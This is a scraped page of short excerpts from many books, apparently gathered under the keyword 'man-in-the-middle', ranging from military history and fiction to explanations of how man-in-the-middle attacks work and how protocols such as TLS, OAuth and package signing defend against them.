5.1, 5.2, 5.3, 5.4, 6.1 Palestinian Islamic Jihad paparazzi Paraguay parents Parrot passwords, 2.1, 2.2 patents PayPal, 5.1, 5.2 peer-to-peer (P2P) networking, 2.1, 4.1, nts.1 Philanthropedia philanthropic organizations Philippines, 3.1, 4.1 photographs photonics photos physical infrastructure Picciolini, Christian Pinker, Steven piracy (online) Pirate Bay, 2.1, 3.1 pirates Plataforma México Poland, 4.1, 7.1 police police brutality police cars popular uprisings pornography postcrisis societies, 3.1, 7.1, 7.2, 7.3, 7.4, 7.5, 7.6, 7.7, 7.8, 7.9, 7.10 poverty power, centralization of power grids Powers, Jonathan power vacuums precision geo-location Predator drones predictive analytics Presidential Records Act privacy, itr.1, 2.1, 2.2, 2.3 in autocracies company policy on, 2.1, 2.2 litigation and in schools security vs., itr.1, 5.1, 5.2 private telecommunications companies processors productivity, 1.1, 1.2 Project Glass property rights Proteus Digital Health proxy servers Psy, n PTSD Pul-e-Charkhi prison Putin, Vladimir Qatar quality of life, 1.1, 1.2 Queen Boat, n racism radio frequency identification (RFID) chips Raytheon real-time collective editing Reaper drones reconstruction connectivity and, 7.1, 7.2 of telecommunications Red Cross, 7.1, 7.2 refugee camps REM cycle remote warfare Renesys, n renrou sousuo yinqing, 197 Reporters Without Borders Reputation.com Research in Motion (RIM), 2.1, 2.2 Resource 207 Responsibility to Protect (RtoP) doctrine restraining orders Revolutionary Armed Forces of Colombia (FARC) revolutions, itr.1, 4.1 connectivity and, 4.1, 4.2, 4.3, 4.4, 4.5, 4.6 finish of public awareness of start of robotic surgical suites, n robots, 1.1, 1.2, 6.1, 6.2, 6.3, 6.4, 6.5 Rodong Sinmun, 97 Roma, 6.1, nts.1 Romania Roomba, 1.1, 6.1 Rosenberg, Tina Roshan Ross, Alec routers RQ-170 Sentinel Rubin, Andy Russia, 3.1, 3.2, 3.3, 3.4, 3.5, 3.6 liberal opposition in revolution in state-owned media in Rwanda genocide in, 6.1, 7.1 safe zones sakoku, 93 Salafis, n Saleh, Ali Abdullah Salem, Mahmoud Samasource Sanger, David E.


pages: 812 words: 180,057

The Generals: American Military Command From World War II to Today by Thomas E. Ricks

affirmative action, airport security, amateurs talk tactics, professionals talk logistics, Charles Lindbergh, Columbine, continuation of politics by other means, cuban missile crisis, hiring and firing, MITM: man-in-the-middle, RAND corporation, Ronald Reagan, South China Sea, Yom Kippur War

For those who died following poor leaders There are no bad soldiers, only bad generals. —Saying attributed to Napoleon CONTENTS ALSO BY THOMAS E. RICKS TITLE PAGE COPYRIGHT DEDICATION EPIGRAPH PROLOGUE: Captain William DePuy and the 90th Division in Normandy, summer 1944 PART I WORLD WAR II 1. General George C. Marshall: The leader 2. Dwight Eisenhower: How the Marshall system worked 3. George Patton: The specialist 4. Mark Clark: The man in the middle 5. “Terrible Terry” Allen: Conflict between Marshall and his protégés 6. Eisenhower manages Montgomery 7. Douglas MacArthur: The general as presidential aspirant 8. William Simpson: The Marshall system and the new model American general PART II THE KOREAN WAR 9. William Dean and Douglas MacArthur: Two generals self-destruct 10. Army generals fail at Chosin 11. O. P. Smith succeeds at Chosin 12.

Narrow as that mission is, it was precisely the job the American military faced in Europe in late 1944 and early 1945, and that is likely the primary reason Patton was never sent home in disgrace. On balance, Eisenhower was right to keep him. And the modern American military probably is worse for not having a few senior commanders with a dose of Patton’s dynamism and color in them. CHAPTER 4 Mark Clark The man in the middle Like Patton, Lt. Gen. Mark Clark was close to Eisenhower, but he was far less effective on the battlefield. Clark was also a difficult man to like. “It makes my flesh creep to be with him,” Patton once wrote in his diary. Ten months later Patton noted that “anyone who serves under Clark is always in danger.” As the American commander in the secondary theater of Italy in 1943 and 1944, Clark fired two corps commanders—that is, generals overseeing groups of divisions.

When the war began, it had been Patton: Eisenhower, At Ease, 237; Blumenson, Patton Papers, 15. “Hell, get on to yourself, Ike”: Blumenson, Patton Papers, 432. Patton also told Eisenhower: Blumenson, Patton Papers, 55, 168. “He is the most modern general”: Blumenson, Patton Papers, 654. See also B. H. Liddell Hart, The German Generals Talk (Berkley, 1958), 215. “a master of fast” . . . “United States Army has known”: Eisenhower, At Ease, 172–73. 4. MARK CLARK: THE MAN IN THE MIDDLE “It makes my flesh creep” . . . “Clark is always in danger”: Blumenson, Patton Papers, 157, 361. the assault was a “near disaster”: General Mark W. Clark, Calculated Risk (Enigma, 2007), 152. “Mark, leave enough ammunition”: Frank James Price, Troy H. Middleton: A Biography (Louisiana State University Press, 1974), 169. British Gen. Harold Alexander: Rick Atkinson, The Day of Battle: The War in Sicily and Italy, 1943–1944 (Henry Holt, 2007), 231.


pages: 91 words: 18,831

Getting Started With OAuth 2.0 by Ryan Boyd

MITM: man-in-the-middle, social graph, web application

There are two main types of replay attacks we wish to prevent: An attacker capturing a user’s OAuth credentials as they log in to a site and using them later on the same site. A rogue application developer using the OAuth token a user was issued to log in to their malicious app in order to impersonate the user on a different legitimate app. The OAuth 2.0 specification requires the OAuth endpoint and APIs to be accessed over SSL/TLS to prevent man-in-the-middle attacks, such as the first case. Preventing rogue application developers from replaying legitimate OAuth credentials their app received in order to impersonate one of their users on another app requires a solution specific to OpenID Connect. This solution is the Check ID Endpoint. The Check ID Endpoint is used to verify that the credentials issued by the OAuth provider were issued to the correct application.


pages: 470 words: 144,455

Secrets and Lies: Digital Security in a Networked World by Bruce Schneier

Ayatollah Khomeini, barriers to entry, business process, butterfly effect, cashless society, Columbine, defense in depth, double entry bookkeeping, fault tolerance, game design, IFF: identification friend or foe, John von Neumann, knapsack problem, MITM: man-in-the-middle, moral panic, mutually assured destruction, pez dispenser, pirate software, profit motive, Richard Feynman, risk tolerance, Silicon Valley, Simon Singh, slashdot, statistical model, Steve Ballmer, Steven Levy, the payments system, Y2K, Yogi Berra

One powerful attack is the man-in-the-middle attack. Alice wants to talk securely with Bob, using some public-key algorithm to establish a key. Eve, the eavesdropper, intercepts Alice’s communication. She pretends to be someone named Bob to Alice, completing the key- exchange protocol. Then she contacts Bob and pretends to be Alice, completing a second key-exchange protocol with Bob. Now she can eavesdrop on the communications. When Alice sends a message to Bob, Eve intercepts it, decrypts it, re-encrypts it, and sends it on to Bob. When Bob sends a message to Alice, Eve performs a similar procedure. This is a powerful attack. Of course, good protocol designers take these attacks into account and try to prevent them. Better communications protocols don’t permit man-in-the-middle attacks, and certainly don’t allow eavesdropping of passwords.

The cryptography software hashes that passphrase to obtain a secret key, and then uses a symmetric algorithm to encrypt the data file. The result is a file that can only be accessed by Alice, or someone else who knows the password. Want to build a secure telephone? Use public-key cryptography to generate a random session key, and then use symmetric cryptography and that session key to encrypt the conversation. A hash function provides added security against man-in-the-middle attacks. (More about those later.) To secure e-mail, use public-key cryptography for privacy and digital signature schemes for authentication. Electronic commerce? Usually nothing more than digital signatures and sometimes encryption for privacy. A secure audit log: combine a hash function, encryption, maybe a MAC, and stir. What we’re doing here is building protocols. A protocol is nothing more than a dance.


Mastering Blockchain, Second Edition by Imran Bashir

3D printing, altcoin, augmented reality, autonomous vehicles, bitcoin, blockchain, business process, carbon footprint, centralized clearinghouse, cloud computing, connected car, cryptocurrency, data acquisition, Debian, disintermediation, disruptive innovation, distributed ledger, domain-specific language, en.wikipedia.org, Ethereum, ethereum blockchain, fault tolerance, fiat currency, Firefox, full stack developer, general-purpose programming language, gravity well, interest rate swap, Internet of things, litecoin, loose coupling, MITM: man-in-the-middle, MVC pattern, Network effects, new economy, node package manager, Oculus Rift, peer-to-peer, platform as a service, prediction markets, QR code, RAND corporation, Real Time Gross Settlement, reversible computing, RFC: Request For Comment, RFID, ride hailing / ride sharing, Satoshi Nakamoto, single page application, smart cities, smart contracts, smart grid, smart meter, supply-chain management, transaction costs, Turing complete, Turing machine, web application, x509 certificate

Most notably, BIP 70 (Payment Protocol) describes the protocol for secure communication between a merchant and customers. This protocol uses X.509 certificates for authentication and runs over HTTP and HTTPS. There are three messages in this protocol: PaymentRequest, Payment, and PaymentACK. The key features of this proposal are defense against man-in-the-middle attacks and secure proof of payment. Man-in-the-middle attacks can result in a scenario where the attacker is sitting between the merchant and the buyer and it would seem to the buyer that they are talking to the merchant, but in fact, the man in the middle is interacting with the buyer instead of the merchant. This can result in manipulation of the merchant's Bitcoin address to defraud the buyer. Several other BIPs, such as BIP 71 (Payment Protocol MIME types) and BIP 72 (URI extensions for Payment Protocol), have also been implemented to standardize payment scheme to support BIP 70 (Payment Protocol).


pages: 562 words: 153,825

Dark Mirror: Edward Snowden and the Surveillance State by Barton Gellman

4chan, A Declaration of the Independence of Cyberspace, active measures, Anton Chekhov, bitcoin, Cass Sunstein, cloud computing, corporate governance, crowdsourcing, data acquisition, Debian, desegregation, Donald Trump, Edward Snowden, financial independence, Firefox, GnuPG, Google Hangouts, informal economy, Jacob Appelbaum, job automation, Julian Assange, MITM: man-in-the-middle, national security letter, planetary scale, private military company, ransomware, Robert Gordon, Robert Hanssen: Double agent, rolodex, Ronald Reagan, Saturday Night Live, Silicon Valley, Skype, social graph, standardized shipping container, Steven Levy, telepresence, undersea cable, web of trust, WikiLeaks, zero day, Zimmermann PGP

tunnel just about anywhere: Even overseas, the NSA may not target a U.S. person for surveillance without a warrant from the FISA Court, but that does not stop it from tapping the infrastructure of U.S. companies. (See chapter 8.) By agreement, with few exceptions, the NSA also restrains itself from clandestine surveillance in Canada, the United Kingdom, Australia, and New Zealand—the other four members of the Five Eyes intelligence partnership. Undisclosed operations inside other allied countries are regarded as risky but not out of bounds. man in the middle: In a man-in-the-middle attack, the NSA places or takes control of equipment directly in the path of digital traffic from one server to another. This enables the agency to read—and alter, for example by injecting malware—the data flow between source and destination. man on the side: A man-on-the-side attack gives the NSA access to but not control of equipment, such as a router or switch, that stands between the source and destination of digital traffic.

The companies are compensated for their trouble from a classified budget for “corporate partners” that reached $394 million in fiscal year 2011. When the NSA cannot negotiate access, it helps itself. Overseas, where domestic legal restrictions do not apply, the acquisitions directorate, S3, is free to tunnel just about anywhere it likes. A worldwide hacking infrastructure called QUANTUM deploys a broad range of tools to inject software exploits, intercept communications with methods known as man in the middle and man on the side, and reroute calls and emails through NSA collection points. Most of these are known as passive operations because they collect electronic signals automatically as they pass through large trunk lines and junctions. When passive methods do not suffice, the job becomes, in NSA parlance, interactive. During one representative week in April 2012, there were 2,588 such interactive missions.


pages: 134 words: 29,488

Python Requests Essentials by Rakesh Vidya Chandra, Bala Subrahmanyam Varanasi

create, read, update, delete, en.wikipedia.org, Kickstarter, MITM: man-in-the-middle, MVC pattern, natural language processing, RFC: Request For Comment, RFID, supply-chain management, web application

GET Default.htm Challenge 401 Access Denied, WWW-Authenticate: Digest nonce="XXXXX" Browser Response GET Default.htm, Authorization: Digest nonce="XXXXX", response="YYYY" Server Returns Default.htm and 200 status This type of authentication gains more strength, as the password in this encryption is not used in the form of plain text. The cracking of the password hashes becomes difficult in digest authentication with the use of a nonce, which counters the chosen plain text attacks. Even though Digest authentication overcomes most of the drawbacks of Basic authentication, it does have some disadvantages. This scheme of authentication is vulnerable to man-in-the-middle attacks. It reduces the flexibility of storing the password in the password's database, as all the well designed password databases use other encryption methods to store them. [ 31 ] Authenticating with Requests Using Digest authentication with Requests Using Digest authentication with requests is very simple. Let us see how it's done: >>> from requests.auth import HTTPDigestAuth >>> requests.get('https://demo.example.com/resource/path', auth=HTTPDigestAuth('user-ID', 'password')) In the preceding lines of code, we carried out digest authentication by creating an HTTPDigestAuth object and setting it to the 'auth' parameter which will be submitted to the server.


pages: 390 words: 96,624

Consent of the Networked: The Worldwide Struggle for Internet Freedom by Rebecca MacKinnon

A Declaration of the Independence of Cyberspace, Bay Area Rapid Transit, Berlin Wall, business cycle, business intelligence, Cass Sunstein, Chelsea Manning, citizen journalism, cloud computing, cognitive dissonance, collective bargaining, conceptual framework, corporate social responsibility, Deng Xiaoping, digital Maoism, don't be evil, Filter Bubble, Firefox, future of journalism, illegal immigration, Jaron Lanier, Jeff Bezos, John Markoff, Joi Ito, Julian Assange, Mark Zuckerberg, Mikhail Gorbachev, MITM: man-in-the-middle, national security letter, online collectivism, Panopticon Jeremy Bentham, Parag Khanna, pre–internet, race to the bottom, Richard Stallman, Ronald Reagan, sharing economy, Silicon Valley, Silicon Valley startup, Skype, Steve Crocker, Steven Levy, WikiLeaks

Activist groups had considered the Syrian Internet to be second only to Ben Ali’s Tunisia when it came to Internet censorship in the Arab world. Bizarrely, in late February as political tensions mounted, the government suddenly unblocked social media websites such as Facebook, Blogspot, and YouTube for the first time since 2007. The reasons soon became clear: soon after the ban was lifted, government hackers launched what is known technically as a “man in the middle” attack on Syrian Facebook users, inserting a false “security certificate” onto people’s browsers when they tried to log into their Facebook accounts through the secure “https” version of the site. This attack enabled government hackers to take over activists’ accounts and gain access to their entire network of contacts. The government also wanted to use social media to get its side of the story across, with the help of citizens claiming loyalty to the government of President Bashar al-Assad.

Meanwhile, Ali Abdulemam—still in hiding—was sentenced in absentia to fifteen years in prison: Leila Nachawati, “Bahrain: Leading Blogger Ali Abdulemam Sentenced to 15 Years in Prison, Along with Other Human Rights Defenders,” Global Voices Advocacy, June 22, 2011, http://advocacy.globalvoicesonline.org/2011/06/22/bahrain-leading-blogger-ali-abdulemam-sentenced-to-15-years-in-prison-along-with-other-human-rights-defenders (all accessed June 27, 2011). 63 statement by King Hamad bin Isa Al Khalifa: “His Majesty Stresses the Key to Reform Is Through Press Freedom,” Bahrain News Agency, May 3, 2011, www.bna.bh/portal/en/news/455101 (accessed August 11, 2011). 64 In Syria, where between March and July 2011 an estimated 1,400 people were killed and at least 15,000 detained: See Neil MacFarquhar and Rick Gladstone, “Outside Pressure Builds on Syria,” New York Times, August 2, 2011, www.nytimes.com/2011/08/03/world/middleeast/03syria.html; and “Syria: Mass Arrest Campaign Intensifies,” Human Rights Watch, July 20, 2011, www.hrw.org/news/2011/07/20/syria-mass-arrest-campaign-intensifies (all accessed August 2, 2011). 64 “man in the middle” attack on Syrian Facebook users: See Anas Qtiesh, “Did Syria Replace Facebook’s Security Certificate with a Forged One?” Global Voices Advocacy, May 4, 2011, http://advocacy.globalvoicesonline.org/2011/05/05/did-syria-replace-facebooks-security-certificate-with-a-forged-one; and Leila Nachawati, “Syrian Uprisings and Official vs. Decentralized Communications,” April 27, 2011, http://advocacy.globalvoicesonline.org/2011/04/27/syrian-uprisings-and-official-vs-decentralized-communications (all accessed June 27, 2011). 64 In May, an organization called the Syrian Electronic Army (SEA) emerged: Helmi Noman, “The Emergence of Open and Organized Pro-Government Cyber Attacks in the Middle East: The Case of the Syrian Electronic Army,” Information Warfare Monitor, May 30, 2011, www.infowar-monitor.net/2011/05/7349. 65 In June, Assad praised SEA directly: Danny O’Brien, “Syria’s Assad Gives Tacit OK to Online Attacks on Press,” June 24, 2011, www.cpj.org/internet/2011/06/syrias-assad-gives-tacit-ok-to-online-attacks-on-p.php#more. 65 the SEA claimed responsibility for attacking the website of the French embassy: “Syrian Electronic Army: Disruptive Attacks and Hyped Targets,” Information Warfare Monitor, June 25, 2011, www.infowar-monitor.net/2011/06/syrian-electronic-army-disruptive-attacks-and-hyped-targets. 67 what researchers at the Open Net Initiative call second- and third-generation Internet controls: Ronald J.


pages: 834 words: 180,700

The Architecture of Open Source Applications by Amy Brown, Greg Wilson

8-hour work day, anti-pattern, bioinformatics, c2.com, cloud computing, collaborative editing, combinatorial explosion, computer vision, continuous integration, create, read, update, delete, David Heinemeier Hansson, Debian, domain-specific language, Donald Knuth, en.wikipedia.org, fault tolerance, finite state, Firefox, friendly fire, Guido van Rossum, linked data, load shedding, locality of reference, loose coupling, Mars Rover, MITM: man-in-the-middle, MVC pattern, peer-to-peer, Perl 6, premature optimization, recommendation engine, revision control, Ruby on Rails, side project, Skype, slashdot, social web, speech recognition, the scientific method, The Wisdom of Crowds, web application, WebSocket

Mirror Authenticity With any distributed mirroring system, clients may want to verify that the mirrored copies are authentic. Some of the possible threats include: the central index may be compromised the mirrors might be tampered with a man-in-the-middle attack between the central index and the end user, or between a mirror and the end user To detect the first attack, package authors need to sign their packages using PGP keys, so that users can verify that the package comes from the author they trust. The mirroring protocol itself only addresses the second threat, though some attempt is made to detect man-in-the-middle attacks. The central index provides a DSA key at the URL /serverkey, in the PEM format as generated by openssl dsa -pubout3. This URL must not be mirrored, and clients must fetch the official serverkey from PyPI directly, or use the copy that came with the PyPI client software.

Verification is not needed when downloading from central index, and clients should not do it to reduce the computation overhead. About once a year, the key will be replaced with a new one. Mirrors will have to re-fetch all /serversig pages. Clients using mirrors need to find a trusted copy of the new server key. One way to obtain one is to download it from https://pypi.python.org/serverkey. To detect man-in-the-middle attacks, clients need to verify the SSL server certificate, which will be signed by the CACert authority. 14.5. Implementation Details The implementation of most of the improvements described in the previous section are taking place in Distutils2. The setup.py file is not used anymore, and a project is completely described in setup.cfg, a static .ini-like file. By doing this, we make it easier for packagers to change the behavior of a project installation without having to deal with Python code.


pages: 404 words: 113,514

Atrocity Archives by Stross, Charles

airport security, anthropic principle, Berlin Wall, brain emulation, British Empire, Buckminster Fuller, defense in depth, disintermediation, experimental subject, glass ceiling, haute cuisine, hypertext link, Khyber Pass, mandelbrot fractal, Menlo Park, MITM: man-in-the-middle, NP-complete, the medium is the message, Y2K, yield curve

"Where were you on Thursday the nineteenth of last month?" "Er, I was attending a training course: Introduction to Applied Occult Computing 104, conducted by Dr. Vohlman." The balding man in the middle makes a doodle on his pad then fixes me with a cold stare. "Your opinion of the course?" "My--er?" I freeze for a moment; this isn't in the script. "I was bored silly--um, the course was fine, but it was a bit basic. I was only there because Harriet was pissed off at me for coming in late after putting in a twenty-hour shift. Dr. Vohlman did a good job, but really it was insanely basic and I didn't learn anything new and wasn't paying much attention--" Why am I saying this? The man in the middle looks at me again. It's like being under a microscope; I feel the back of my neck burst out in a cold, prickly sweat. "When you weren't paying attention, what were you doing?"


pages: 349 words: 114,038

Culture & Empire: Digital Revolution by Pieter Hintjens

4chan, airport security, AltaVista, anti-communist, anti-pattern, barriers to entry, Bill Duvall, bitcoin, blockchain, business climate, business intelligence, business process, Chelsea Manning, clean water, commoditize, congestion charging, Corn Laws, correlation does not imply causation, cryptocurrency, Debian, Edward Snowden, failed state, financial independence, Firefox, full text search, German hyperinflation, global village, GnuPG, Google Chrome, greed is good, Hernando de Soto, hiring and firing, informal economy, intangible asset, invisible hand, James Watt: steam engine, Jeff Rulifson, Julian Assange, Kickstarter, M-Pesa, mass immigration, mass incarceration, mega-rich, MITM: man-in-the-middle, mutually assured destruction, Naomi Klein, national security letter, Nelson Mandela, new economy, New Urbanism, Occupy movement, offshore financial centre, packet switching, patent troll, peak oil, pre–internet, private military company, race to the bottom, rent-seeking, reserve currency, RFC: Request For Comment, Richard Feynman, Richard Stallman, Ross Ulbricht, Satoshi Nakamoto, security theater, selection bias, Skype, slashdot, software patent, spectrum auction, Steve Crocker, Steve Jobs, Steven Pinker, Stuxnet, The Wealth of Nations by Adam Smith, The Wisdom of Crowds, trade route, transaction costs, twin studies, union organizing, wealth creators, web application, WikiLeaks, Y2K, zero day, Zipf's Law

Anyone who has B can decrypt it, and they know it came from me. This gives us secrecy, thanks to the encryption, and also "authentication," which is the knowledge that the data really came from me, and not an impostor. There is little point in encryption if we can't be sure of the sender. There's a small catch: you also need to be sure that B is really my key, and was not switched by some "man in the middle," or MIM. For asymmetric keys to work at all well, those encryption keys must be exchanged securely, which creates an interesting Catch-22 that attackers exploit. The keys must also, and this is very important, be really random and unguessable. If you can guess the keys, the whole encryption exercise is for naught. Even if your guesses are very vague, it can make the difference between trying different keys for an hour, or for 50 years.

Hence the emotional discussions on the Linux lists about that random number generator patch. In 2013, any security product that isn't open source isn't credible. We're still not secure, however. Let's say we can generate really strong keys that no-one could ever guess, immune from rubber-hose attacks, and hard enough to crack that it would take a zillion years to try all combinations. It's still trivial to break such security, if I can do a man in the middle attack. A MIM attack takes advantage of the fact that even if we can create secure keys, we need some way to exchange them. It's like me sending the key to my house in the mail to a person coming to stay. An attacker can open the mail, take out my key, substitute his, with a letter containing an impostor address. The poor visitor will come to the wrong house, enter, and know nothing. Meanwhile the attacker can enter my house, pretending to be the visitor.


pages: 443 words: 116,832

The Hacker and the State: Cyber Attacks and the New Normal of Geopolitics by Ben Buchanan

active measures, Bernie Sanders, bitcoin, blockchain, borderless world, Brian Krebs, British Empire, Cass Sunstein, citizen journalism, credit crunch, cryptocurrency, cuban missile crisis, data acquisition, Donald Trump, drone strike, Edward Snowden, family office, hive mind, Internet Archive, Jacob Appelbaum, John Markoff, John von Neumann, Julian Assange, Kickstarter, kremlinology, MITM: man-in-the-middle, Nate Silver, profit motive, RAND corporation, ransomware, risk tolerance, Robert Hanssen: Double agent, rolodex, Ronald Reagan, Silicon Valley, South China Sea, Steve Jobs, Stuxnet, technoutopianism, undersea cable, uranium enrichment, Vladimir Vetrov: Farewell Dossier, WikiLeaks, zero day

Even as the PLA generated new hop points, TAO had such good access and insight into the PLA’s efforts that it could identify the new computers fairly easily. But why stop there? Instead of observing from hop points and watching from the PLA’s internet provider, TAO could go further. The NSA’s hackers could, at long last, target the actual computers owned by the hackers in this part of the PLA. TAO employed something called a man-in-the-middle operation. This requires access to the target’s internet traffic, access that TAO’s hacking efforts had gained with their penetration of China’s hacking infrastructure. From this privileged vantage point, the NSA’s hackers could intercept and sometimes manipulate the PLA’s data as it moved from its source to its destination and back again.9 Using this access, TAO appears to have added some secret malicious code to the PLA’s normal internet traffic, hacking the computers from which the Chinese carried out their operations.

See also AT&T; corporations compellence, 168–169 competition, 5, 9 conventional operations, compared to cyber operations, 189 Conway, Kellyanne, 239 cookies, 35 corporate access: by China, 88; shaping and, 39; signaling and, 39 corporations: access to data from, combined with passive collection, 13–39; intelligence community and, 15–16, 64–85; laws compelling cooperation of, 25. See also AT&T; commercial partnerships Cosmos Cooperative Bank, 284–287 counterfeiting, 268–269, 270–271 counterintelligence, 108–125; ARROWECLIPSE, 112–113; detecting adversary’s hacking efforts against other targets, 116–120; fourth-party collection, 120–125; man-in-the-middle operations, 114–115; persistence / agressiveness in, 116; proactive, 109–110, 112; Tailored Access Operations (TAO), 112–115, 117, 258; targeting hop points, 112–113; Territorial Dispute (TeDi) program, 117–118, 120; uncovering of new actors by, 118–120 counternarcotics, 32 covert action, 309 CRASHOVERRIDE, 197–201, 204, 205, 310 credentials, stolen, 38, 191–193; DNC employees’, 215; in election interference, 218–220; in North Korean campaign, 276; in second Ukraine blackout, 197.


pages: 587 words: 117,894

Cybersecurity: What Everyone Needs to Know by P. W. Singer, Allan Friedman

4chan, A Declaration of the Independence of Cyberspace, Apple's 1984 Super Bowl advert, barriers to entry, Berlin Wall, bitcoin, blood diamonds, borderless world, Brian Krebs, business continuity plan, Chelsea Manning, cloud computing, crowdsourcing, cuban missile crisis, data acquisition, do-ocracy, drone strike, Edward Snowden, energy security, failed state, Fall of the Berlin Wall, fault tolerance, global supply chain, Google Earth, Internet of things, invention of the telegraph, John Markoff, Julian Assange, Khan Academy, M-Pesa, MITM: man-in-the-middle, mutually assured destruction, Network effects, packet switching, Peace of Westphalia, pre–internet, profit motive, RAND corporation, ransomware, RFC: Request For Comment, risk tolerance, rolodex, Silicon Valley, Skype, smart grid, Steve Jobs, Stuxnet, uranium enrichment, We are Anonymous. We are Legion, web application, WikiLeaks, zero day, zero-sum game

Not so coincidentally, this was the exact setup at the Natanz nuclear facility, a suspected site in Iran’s illicit nuclear weapons program. Things got especially tricky once Stuxnet found its way into this target (it was later revealed that the delivery mechanism was infiltration through Iranian nuclear scientists’ own laptops and memory sticks). Langner discovered that the cyberattack didn’t shut down the centrifuges in any obvious manner. Instead, it ran a series of subroutines. One, known as a “man in the middle,” caused tiny adjustments in pressure inside the centrifuges. Another manipulated the speed of the centrifuges’ spinning rotors, causing them to alternately slow down and then speed back up, throwing the rotors out of whack and ruining their work. On top of this, every so often the malware would push the centrifuge speeds past the designed maximum. So the centrifuges weren’t just failing to produce refined uranium fuel, they were frequently breaking down and grinding to a halt from the damaging vibrations that the various random surges caused.

When he went out, agents from Mossad, the Israeli intelligence agency, snuck into his room and installed a Trojan horse onto the laptop to allow them to monitor his communications. That was bad enough for the Syrians. But one man’s poor computer security turned out to have more significant consequences when the Israelis began to examine the files that the official had stored on the laptop’s hard drive, including pictures. One photo in particular caught the Israelis’ attention. It showed an Asian man in a blue tracksuit standing next to an Arab man in the middle of the Syrian desert. It could have been innocuous, but then Mossad identified the two men as Chon Chibu, a leader of the North Korean nuclear program, and Ibrahim Othman, director of the Syrian Atomic Energy Commission. Combined with other documents lifted from the hard drive, such as construction plans and photos of a type of pipe used for work on fissile materiel, the Israelis realized the laptop was an atomic alarm bell.


pages: 461 words: 125,845

This Machine Kills Secrets: Julian Assange, the Cypherpunks, and Their Fight to Empower Whistleblowers by Andy Greenberg

Apple II, Ayatollah Khomeini, Berlin Wall, Bill Gates: Altair 8800, Burning Man, Chelsea Manning, computerized markets, crowdsourcing, cryptocurrency, domain-specific language, drone strike, en.wikipedia.org, fault tolerance, hive mind, Jacob Appelbaum, Julian Assange, Mahatma Gandhi, Mitch Kapor, MITM: man-in-the-middle, Mohammed Bouazizi, nuclear winter, offshore financial centre, pattern recognition, profit motive, Ralph Nader, Richard Stallman, Robert Hanssen: Double agent, Silicon Valley, Silicon Valley ideology, Skype, social graph, statistical model, stem cell, Steve Jobs, Steve Wozniak, Steven Levy, undersea cable, Vernor Vinge, We are Anonymous. We are Legion, We are the 99%, WikiLeaks, X Prize, Zimmermann PGP

If Alice in New York wants to send a private message to Bob in London, she uses a private key to encrypt her message and Bob uses the same key to decrypt it. But there’s an inherent Achilles’ heel in that scheme: If Bob has never met Alice, how does Bob get Alice’s key securely? She has to send it to him somehow. But they can’t encrypt the message that carries the key—they come up against the same problem of how to send a key that decrypts that message. If Alice gives up and mails Bob an unencrypted key, on the other hand, any sinister man-in-the-middle could intercept it, copy it, send it on its way, and then decode all their future messages. Unless Alice and Bob have already met in some dark alley and shared their key, private key encryption is hardly private at all. (In fact, it’s called “private key encryption” precisely because the key must be kept private, which is what makes actually using it so tough.) Public key encryption, on the other hand, uses some mathematical tricks that vaporize that private key problem as thoroughly as a used one-time pad in a burn bag.

And it has the unique, almost magical property: What’s encrypted with that key can only be decrypted with Bob’s private key. Suddenly the conundrum of how Alice mails the private key to Bob disappears. Bob already has the private key, and he can send his public key—the key Alice needs to encrypt messages that only Bob can unlock—to Alice on a postcard from London to New York. The sinister man-in-the-middle can read that postcard all he likes. Not only that, Bob posts his public key on his website, prints it on his business card, and even adds it to the signature of his e-mail. In fact, Bob wants everyone to see the public key, because it’s used for harmlessly scrambling secrets, not unscrambling them. Bob’s private key, meanwhile, remains cozily stored on his hard drive, and never has to be shipped across the Atlantic Ocean.


Drown by Junot Diaz

MITM: man-in-the-middle

The small man wept quietly. How far you going? the driver asked. New York, he said, carefully omitting the Nueva and the Yol. We ain’t going that far but you can ride with us to Trenton if you like. Where the hell you from pal? Miami. Miami. Miami’s kind of far from here. The other man looked at the driver. Are you a musician or something? Jes, Papi said. I play the accordion. That excited the man in the middle. Shit, my old man played the accordion but he was a Polack like me. I didn’t know you spiks played it too. What kind of polkas do you like? Polkas? Jesus, Will, the driver said. They don’t play polkas in Cuba. They drove on, slowing only to unfold their badges at the tolls. Papi sat still and listened to the man crying in the back. What is wrong? Papi asked. Maybe sick? The driver snorted.


pages: 170 words: 51,205

Information Doesn't Want to Be Free: Laws for the Internet Age by Cory Doctorow, Amanda Palmer, Neil Gaiman

Airbnb, barriers to entry, Brewster Kahle, cloud computing, Dean Kamen, Edward Snowden, game design, Internet Archive, John von Neumann, Kickstarter, MITM: man-in-the-middle, optical character recognition, plutocrats, Plutocrats, pre–internet, profit maximization, recommendation engine, rent-seeking, Saturday Night Live, Skype, Steve Jobs, Steve Wozniak, Stewart Brand, transfer pricing, Whole Earth Catalog, winner-take-all economy

Playing shenanigans with DNS has lots of upsides, if you’re a criminal or an oppressive government. Criminals like to hack DNS servers to redirect requests like “www.citibank.com” to lookalike webpages that they operate, so that they can get your banking details and clean you out when you unsuspectingly type in your password. Oppressive governments like to redirect gmail.com and facebook.com to their own “man-in-the-middle” servers, so that they can snoop on citizens’ email and figure out whom to arrest. Lots of people are trying to solve the DNS problem. It is real, and grave. Many Internet-security experts consider the insecurity of DNS to represent an existential threat to the Internet itself, and there are many efforts under way, like DNSSEC, to add a layer of security to the service. Your ability to vote, interact with your government, bank, get an education, and securely conduct most of the rest of your online life is dependent on the outcome of these efforts.


Designing Web APIs: Building APIs That Developers Love by Brenda Jin, Saurabh Sahni, Amir Shevat

active measures, Amazon Web Services, augmented reality, blockchain, business process, continuous integration, create, read, update, delete, Google Hangouts, if you build it, they will come, Lyft, MITM: man-in-the-middle, premature optimization, pull request, Silicon Valley, Snapchat, software as a service, the market place, uber lyft, web application, WebSocket

This way, if client secrets and refresh tokens are compro‐ mised, applications can stop an attacker with a leaked client secret from renewing access tokens. OAuth scopes for sensitive information Protect sensitive information on your service by using dedicated OAuth scopes. This way, your users will not grant access to sen‐ sitive information to every application that might not need it. HTTPS endpoints Because access tokens are sent as part of every HTTP request, it’s important that your API endpoints require HTTPS. This prevents man-in-the-middle attacks. Verify redirect URL When the optional redirect URL is provided, during an authori‐ zation request, ensure that it matches to one of the registered URLs for the application. If not, the API server must show an error without showing the authorization prompt. This ensures that any returned secrets are not exposed to an attacker. OAuth | 39 Disallow rendering the authorization screen in iframes Use the X-Frame-Options header to deny rendering an authori‐ zation page in an iframe.


pages: 225 words: 55,458

Back to School: Why Everyone Deserves a Second Chance at Education by Mike Rose

